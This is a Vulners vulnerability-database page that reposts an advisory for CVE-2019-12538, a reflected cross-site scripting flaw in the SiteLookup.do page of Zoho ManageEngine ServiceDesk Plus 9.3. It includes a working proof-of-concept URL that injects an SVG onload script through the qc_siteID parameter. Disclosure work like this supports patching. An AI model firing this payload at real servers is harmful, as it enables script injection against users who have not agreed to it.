Vulners
Lucene search
Zoho ManageEngine ServiceDesk Plus 9.3 - 'SiteLookup.do' Cross-Site Scripting
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
 | Zoho ManageEngine ServiceDesk Plus 9.3 - (SiteLookup.do) Cross-Site Scripting Vulnerability | 5 Jun 201900:00 | – | zdt |
 | ZOHO ManageEngine ServiceDesk Plus Cross-Site Scripting Vulnerability (CNVD-2019-16592) | 5 Jun 201900:00 | – | cnvd |
 | CVE-2019-12538 | 5 Jun 201914:40 | – | cve |
 | CVE-2019-12538 | 5 Jun 201914:40 | – | cvelist |
 | EUVD-2019-4133 | 7 Oct 202500:30 | – | euvd |
 | Zoho ManageEngine ServiceDesk Plus 9.3 - SiteLookup.do Cross-Site Scripting | 4 Jun 201900:00 | – | exploitpack |
 | CVE-2019-12538 | 5 Jun 201915:29 | – | nvd |
 | CVE-2019-12538 | 5 Jun 201915:29 | – | osv |
 | Zoho ManageEngine ServiceDesk Plus 9.3 Cross Site Scripting | 4 Jun 201900:00 | – | packetstorm |
 | Design/Logic Flaw | 5 Jun 201915:29 | – | prion |
10
# Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via SiteLookup.do
# Date: 2019-06-04
# Exploit Author: Tarantula Team - VinCSS (a member of Vingroup)
# Vendor Homepage: https://www.manageengine.com/products/service-desk
# Version: Zoho ManageEngine ServiceDesk Plus 9.3
# CVE : CVE-2019-12538
Information Description: An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the SiteLookup.do qc_siteID parameter
Attack vector: domain/SiteLookup.do?configID=0&SELECTSITE=qc_siteID"/><svg onload=alert('XSS')>&userConfigID=21111111&SELECTEDSITEID=1&SELECTEDSITENAME=
PoC: https://drive.google.com/file/d/1Oo_lC_XCtAiF2Gvx_ZoS8Yqwunc1U_57/viewData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Jun 2019 00:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 24.3
CVSS 36.1
EPSS0.01693